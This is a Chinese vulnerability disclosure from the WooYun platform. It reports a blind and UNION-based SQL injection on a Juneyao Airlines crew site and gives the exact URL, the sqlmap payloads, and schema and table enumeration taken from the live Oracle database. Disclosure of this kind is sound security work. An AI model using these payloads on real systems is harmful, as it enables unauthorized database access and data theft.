漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048636
漏洞标题:吉祥航空某站boolean based blind SQL注入
相关厂商:吉祥航空
漏洞作者: Mr.leo
提交时间:2014-01-12 10:47
修复时间:2014-02-26 10:48
公开时间:2014-02-26 10:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-17: 厂商已经确认,细节仅向厂商公开
2014-01-27: 细节向核心白帽子及相关领域专家公开
2014-02-06: 细节向普通白帽子公开
2014-02-16: 细节向实习白帽子公开
2014-02-26: 细节向公众公开
简要描述:
吉祥航空某站boolean-based blind SQL注入
详细说明:
站点:
crew.juneyaoair.com
利用搜索引擎发现多处存在信息泄露,并且URL存在sql注入漏洞
flight_date参数没有过滤,导致注射
http://crew.juneyaoair.com/admin_purser_an_detail.jsp?flight_date=2014-01-10&userCode=S2018641
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: flight_date
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: flight_date=2014-01-10') AND 4609=4609 AND ('tQYS'='tQYS&userCode=S2018641
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: flight_date=2014-01-10') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(121)||CHR(100)||CHR(100)||CHR(58)||CHR(89)||CHR(118)||CHR(66)||CHR(74)||CHR(102)||CHR(72)||CHR(66)||CHR(112)||CHR(71)||CHR(72)||CHR(58)||CHR(98)||CHR(111)||CHR(115)||CHR(58), NULL FROM DUAL-- &userCode=S2018641
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: flight_date
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: flight_date=2014-01-10') AND 4609=4609 AND ('tQYS'='tQYS&userCode=S2018641
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: flight_date=2014-01-10') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(121)||CHR(100)||CHR(100)||CHR(58)||CHR(89)||CHR(118)||CHR(66)||CHR(74)||CHR(102)||CHR(72)||CHR(66)||CHR(112)||CHR(71)||CHR(72)||CHR(58)||CHR(98)||CHR(111)||CHR(115)||CHR(58), NULL FROM DUAL-- &userCode=S2018641
---
current user: 'JXFOC'
current schema (equivalent to database on Oracle): 'JXFOC'
available databases [12]:
[*] ACARS2FORHO
[*] AIS
[*] APPQOSSYS
[*] CDM
[*] CREW
[*] DBSNMP
[*] DTM
[*] JXFOC
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] WMSYS
599张表啊,部分说明问题
[09:55:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[09:55:35] [INFO] fetching tables for database: 'JXFOC'
[09:55:45] [INFO] the SQL query used returns 559 entries
[09:55:55] [INFO] retrieved: "FLIGHT_ZANBU_ZHIXING_AMEND"
[09:56:04] [INFO] retrieved: "T6007_HIS_SAVE"
[09:56:14] [INFO] retrieved: "T6007_QCODE"
[09:56:23] [INFO] retrieved: "C1001"
[09:56:33] [INFO] retrieved: "C1002"
[09:57:04] [INFO] retrieved: "C1003"
[09:57:14] [INFO] retrieved: "C1004"
[09:57:23] [INFO] retrieved: "DISPATCH_WAIJI_PILOT_SPE_APT"
[09:57:33] [INFO] retrieved: "DIV_AIRPORT"
[09:57:42] [INFO] retrieved: "DMBZ_ZSCLOSED"
[09:57:52] [INFO] retrieved: "DMBZ_ZSCLOSED_LOG"
[09:58:01] [INFO] retrieved: "D_CLIENT"
[09:58:11] [INFO] retrieved: "F0001"
[09:58:21] [INFO] retrieved: "F0002"
[09:58:32] [INFO] retrieved: "F0003"
[09:58:45] [INFO] retrieved: "F0004"
[09:58:55] [INFO] retrieved: "F0005"
[09:59:05] [INFO] retrieved: "F0006"
[09:59:14] [INFO] retrieved: "FILES_CLICK"
[09:59:23] [INFO] retrieved: "FLIGHT_PLAN_MAKE_LOG"
[09:59:33] [INFO] retrieved: "FLIGHT_PLAN_XML_LOG"
[09:59:43] [INFO] retrieved: "FLIGHT_PLAN_XML_TEMP"
[09:59:52] [INFO] retrieved: "C8007"
[10:00:02] [INFO] retrieved: "C8008"
[10:00:11] [INFO] retrieved: "C8009"
[10:00:21] [INFO] retrieved: "DATA_INDEX"
[10:00:30] [INFO] retrieved: "DATA_INFO"
[10:00:40] [INFO] retrieved: "T8009"
[10:00:49] [INFO] retrieved: "T8020"
[10:00:59] [INFO] retrieved: "T8021"
[10:01:08] [INFO] retrieved: "T8101"
[10:01:18] [INFO] retrieved: "T8101B"
[10:01:29] [INFO] retrieved: "T8102"
[10:01:39] [INFO] retrieved: "T8103"
[10:01:48] [INFO] retrieved: "T8104"
[10:01:58] [INFO] retrieved: "T8105"
[10:02:07] [INFO] retrieved: "T8106"
[10:02:17] [INFO] retrieved: "T8107"
[10:02:26] [INFO] retrieved: "T8108"
[10:02:36] [INFO] retrieved: "T8109"
[10:02:45] [INFO] retrieved: "T8110"
[10:02:55] [INFO] retrieved: "T8111"
[10:03:04] [INFO] retrieved: "T8112"
[10:03:14] [INFO] retrieved: "T8113"
[10:03:23] [INFO] retrieved: "T7016"
[10:03:33] [INFO] retrieved: "T_FLY_HOURS_FORECAST"
[10:03:42] [INFO] retrieved: "T_FOOD"
[10:03:52] [INFO] retrieved: "T_FOODCAR"
[10:04:01] [INFO] retrieved: "T_HBHL"
[10:04:10] [INFO] retrieved: "T_HBZL"
[10:04:20] [INFO] retrieved: "T_HDPJ"
[10:04:29] [INFO] retrieved: "T_HDXX"
[10:04:39] [INFO] retrieved: "T_HLDJ"
[10:04:48] [INFO] retrieved: "T_HLXX"
[10:04:58] [INFO] retrieved: "T_HXFX"
[10:05:07] [INFO] retrieved: "T_HXFX_JX"
[10:05:17] [INFO] retrieved: "T_HXFX_NOJX"
[10:05:26] [INFO] retrieved: "T_HXFX_TZ"
[10:05:36] [INFO] retrieved: "T_HXXX"
[10:05:45] [INFO] retrieved: "T_HYFX"
[10:05:55] [INFO] retrieved: "T7105_EDIT"
[10:06:04] [INFO] retrieved: "T7106"
[10:06:14] [INFO] retrieved: "T7106_EDIT"
[10:06:23] [INFO] retrieved: "T7107"
[10:06:33] [INFO] retrieved: "T7107_COPY"
[10:06:42] [INFO] retrieved: "T7107_EDIT"
[10:06:51] [INFO] retrieved: "T7108"
[10:07:01] [INFO] retrieved: "T7108_EDIT"
[10:07:10] [INFO] retrieved: "T7110"
[10:07:20] [INFO] retrieved: "T7110_EDIT"
[10:07:29] [INFO] retrieved: "T7111"
[10:07:39] [INFO] retrieved: "T7201"
[10:07:48] [INFO] retrieved: "T7204"
[10:07:58] [INFO] retrieved: "T8001"
[10:08:07] [INFO] retrieved: "T8002"
[10:08:17] [INFO] retrieved: "T8003"
[10:08:26] [INFO] retrieved: "T7001_SUN"
[10:08:36] [INFO] retrieved: "T7001_XH"
[10:08:45] [INFO] retrieved: "T7002"
[10:08:55] [INFO] retrieved: "T7005"
[10:09:04] [INFO] retrieved: "T7005_EDIT"
[10:09:14] [INFO] retrieved: "T7006"
[10:09:23] [INFO] retrieved: "T7006_EDIT"
[10:09:33] [INFO] retrieved: "T7008"
[10:09:42] [INFO] retrieved: "T7009"
[10:09:52] [INFO] retrieved: "T7101"
[10:10:01] [INFO] retrieved: "T7101_EDIT"
[10:10:11] [INFO] retrieved: "T7102"
[10:10:20] [INFO] retrieved: "T7102_EDIT"
[10:10:30] [INFO] retrieved: "T7103"
[10:10:39] [INFO] retrieved: "T7103_EDIT"
[10:10:49] [INFO] retrieved: "T7104"
[10:10:58] [INFO] retrieved: "T7104_EDIT"
[10:11:08] [INFO] retrieved: "T7105"
[10:11:17] [INFO] retrieved: "ACARS_OIL_SAVE_NEW_ORG"
[10:11:26] [INFO] retrieved: "ACARS_OIL_SAVE_NEW_STATISTIC"
[10:11:36] [INFO] retrieved: "ACARS_OIL_SAVE_STATISTIC"
[10:11:46] [INFO] retrieved: "ACARS_OIL_SAVE_STATISTIC_ORG"
[10:11:55] [INFO] retrieved: "ACARS_OIL_SAVE_STA_JETPLAN"
[10:12:05] [INFO] retrieved: "ACARS_OIL_STANDARD"
[10:12:14] [INFO] retrieved: "ACARS_OIL_STATISTIC_PER_ROUTE"
[10:12:24] [INFO] retrieved: "ACARS_OTHER_TEL_SEND"
[10:12:33] [INFO] retrieved: "ACARS_PEIZAI_TEL_SEND"
[10:12:43] [INFO] retrieved: "ACARS_TRACE_USER_LOG"
[10:12:52] [INFO] retrieved: "ADMIN_VOTE"
[10:13:01] [INFO] retrieved: "ADMIN_VOTE_ITEM"
[10:13:11] [INFO] retrieved: "ADMIN_VOTE_SUB"
[10:13:20] [INFO] retrieved: "ALTITUDE"
[10:13:30] [INFO] retrieved: "AOC_SOFT_VERSION_LOG"
[10:13:39] [INFO] retrieved: "AUDIT_LOG"
[10:13:49] [INFO] retrieved: "BASE_EMPLOYEE"
[10:13:58] [INFO] retrieved: "BUZHENGCHANG_SHEET"
[10:14:08] [INFO] retrieved: "C1004_SPECIAL_APT"
[10:14:17] [INFO] retrieved: "C1005"
[10:14:26] [INFO] retrieved: "C1006"
[10:14:36] [INFO] retrieved: "C1008"
[10:14:45] [INFO] retrieved: "C1009"
[10:14:55] [INFO] retrieved: "C1009_LOG"
[10:15:04] [INFO] retrieved: "C2001"
[10:15:14] [INFO] retrieved: "C2002"
[10:15:23] [INFO] retrieved: "C2006"
[10:15:32] [INFO] retrieved: "C3001"
[10:15:42] [INFO] retrieved: "C3001_LOG"
[10:15:51] [INFO] retrieved: "C3002"
[10:16:01] [INFO] retrieved: "C3004"
[10:16:10] [INFO] retrieved: "C3005"
[10:16:20] [INFO] retrieved: "C3006"
[10:16:29] [INFO] retrieved: "C3007"
[10:16:39] [INFO] retrieved: "C3008"
[10:16:48] [INFO] retrieved: "MANAGER_AUTH"
[10:16:58] [INFO] retrieved: "MODEL"
[10:17:07] [INFO] retrieved: "WAIJI_ROUTE_LIST"
[10:17:17] [INFO] retrieved: "MEL_DISPATCH_LIST"
[10:17:26] [INFO] retrieved: "C8006"
[10:17:36] [INFO] retrieved: "CANGSHI_TEST"
[10:17:45] [INFO] retrieved: "COMMON_MOBILE_GROUP"
[10:17:55] [INFO] retrieved: "COMMON_MOBILE_USER"
[10:18:04] [INFO] retrieved: "CW_VOTE"
[10:18:17] [INFO] retrieved: "CW_VOTE_ITEM"
[10:18:27] [INFO] retrieved: "CW_VOTE_SUB"
[10:18:36] [INFO] retrieved: "D1001"
[10:18:46] [INFO] retrieved: "D1002"
[10:18:55] [INFO] retrieved: "D1002_1"
[10:19:05] [INFO] retrieved: "D1003"
[10:19:14] [INFO] retrieved: "D1005"
[10:19:24] [INFO] retrieved: "D1006"
[10:19:33] [INFO] retrieved: "DELAY_BUSSINESS_CODE"
[10:19:43] [INFO] retrieved: "DEPT_AUTH"
[10:19:52] [INFO] retrieved: "DEPT_MANAGER"
[10:20:02] [INFO] retrieved: "DESIREMISSION"
[10:20:11] [INFO] retrieved: "DIANBAO_SAVE"
[10:20:21] [INFO] retrieved: "DISPATCH_MOBILE_GROUP"
[10:20:30] [INFO] retrieved: "DISPATCH_MOBILE_USER"
[10:20:40] [INFO] retrieved: "DISPATCH_ROUTE_CAUTION"
[10:20:49] [INFO] retrieved: "T_HYFX_BASE"
[10:20:58] [INFO] retrieved: "T_HYFX_QJF"
[10:21:08] [INFO] retrieved: "T_HYSR"
[10:21:18] [INFO] retrieved: "T_HYSR_PB_RESULT"
[10:21:27] [INFO] retrieved: "T_HYSR_TZ"
[10:21:37] [INFO] retrieved: "T_HYSR_XS"
[10:21:46] [INFO] retrieved: "T_HY_PRODUCT"
[10:21:55] [INFO] retrieved: "T_HY_XS_PZ"
[10:22:05] [INFO] retrieved: "T_JGP"
[10:22:14] [INFO] retrieved: "T_JGP_MX"
[10:22:24] [INFO] retrieved: "T_JJJL"
[10:22:33] [INFO] retrieved: "T_JYJ"
[10:22:43] [INFO] retrieved: "T_KYSR"
[10:22:52] [INFO] retrieved: "T_KYSR_BO"
[10:23:02] [INFO] retrieved: "T_KYSR_YG"
[10:23:11] [INFO] retrieved: "T_LOG"
[10:23:21] [INFO] retrieved: "PBCATEDT"
[10:23:31] [INFO] retrieved: "PBCATFMT"
[10:23:40] [INFO] retrieved: "PBCATTBL"
[10:23:50] [INFO] retrieved: "PBCATVLD"
[10:24:00] [INFO] retrieved: "PEIZAI_0_OIL_INDEX"
[10:24:09] [INFO] retrieved: "PEIZAI_ALL_LINE_INDEX"
[10:24:18] [INFO] retrieved: "PEIZAI_LAND_OIL_INDEX"
[10:24:28] [INFO] retrieved: "PEIZAI_MAC_TO_TRIM"
[10:24:38] [INFO] retrieved: "PEIZAI_OIL_INDEX"
[10:24:47] [INFO] retrieved: "PEIZAI_SHUAIBIANZI_INFO"
[10:24:56] [INFO] retrieved: "PEIZAI_SHUAIBIANZI_INFO_CHECK"
[10:25:06] [INFO] retrieved: "PEIZAI_SPECAIL_FLT_LIST"
[10:25:15] [INFO] retrieved: "PEIZAI_TAKEOFF_OIL_INDEX"
[10:25:25] [INFO] retrieved: "PILOT_CHECK_121_INFO"
[10:25:34] [INFO] retrieved: "PILOT_CHECK_DANGER_CARGO_INFO"
[10:25:44] [INFO] retrieved: "PILOT_CHECK_EMERGENT_INFO"
[10:25:53] [INFO] retrieved: "PILOT_CHECK_SPECIAL_ROUTE_INFO"
[10:26:02] [INFO] retrieved: "T3041"
[10:26:12] [INFO] retrieved: "T3041A"
[10:26:21] [INFO] retrieved: "T3041B"
[10:26:31] [INFO] retrieved: "T3044"
[10:26:40] [INFO] retrieved: "T3046"
[10:26:50] [INFO] retrieved: "T3063"
[10:26:59] [INFO] retrieved: "T3090"
[10:27:09] [INFO] retrieved: "T3091"
[10:27:18] [INFO] retrieved: "T3093_NEW"
[10:27:28] [INFO] retrieved: "T_NOTAM_BOARD"
[10:27:37] [INFO] retrieved: "T_NOTAM_DATA"
[10:27:47] [INFO] retrieved: "T_OILPRICE"
[10:27:56] [INFO] retrieved: "T_QJF"
[10:28:06] [INFO] retrieved: "T_RSP_YF"
[10:28:15] [INFO] retrieved: "T_RSP_YY"
[10:28:25] [INFO] retrieved: "T_TRAVEL_CUSTOMER"
[10:28:34] [INFO] retrieved: "T3018A"
[10:28:43] [INFO] retrieved: "T3037"
[10:28:53] [INFO] retrieved: "T3038"
[10:29:02] [INFO] retrieved: "T_TRAVEL_HOTEL_ROOM"
[10:29:12] [INFO] retrieved: "T_TRAVEL_TOUR"
[10:29:21] [INFO] retrieved: "T_TRAVEL_VOUCHER"
[10:29:30] [INFO] retrieved: "T_TRAVEL_VOUCHER_HOTEL"
[10:29:40] [INFO] retrieved: "T_TRAVEL_VOUCHER_STATUS"
[10:29:49] [INFO] retrieved: "T_VERSION"
[10:29:59] [INFO] retrieved: "T_YT_OIL"
[10:30:09] [INFO] retrieved: "T_YYB"
[10:30:18] [INFO] retrieved: "T_YYSR"
[10:30:27] [INFO] retrieved: "T_YYSR_XS"
[10:30:37] [INFO] retrieved: "T_ZBKH_HX"
[10:30:46] [INFO] retrieved: "T_ZBKH_HXTYPE"
[10:30:56] [INFO] retrieved: "T_ZBKH_ZB"
[10:31:06] [INFO] retrieved: "WP_HYFILE"
[10:31:15] [INFO] retrieved: "XUNLIAN_PERSON_INFO"
[10:31:25] [INFO] retrieved: "XUNLIAN_STEP_SETUP"
over
漏洞证明:
已经证明
修复方案:
过滤参数,请厂商自行检查其他参数是否有问题。
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-01-17 08:49
厂商回复:
最新状态:
暂无